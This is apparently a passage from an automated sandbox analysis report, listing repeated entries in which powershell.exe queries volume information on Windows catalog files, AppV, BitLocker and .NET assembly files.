      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
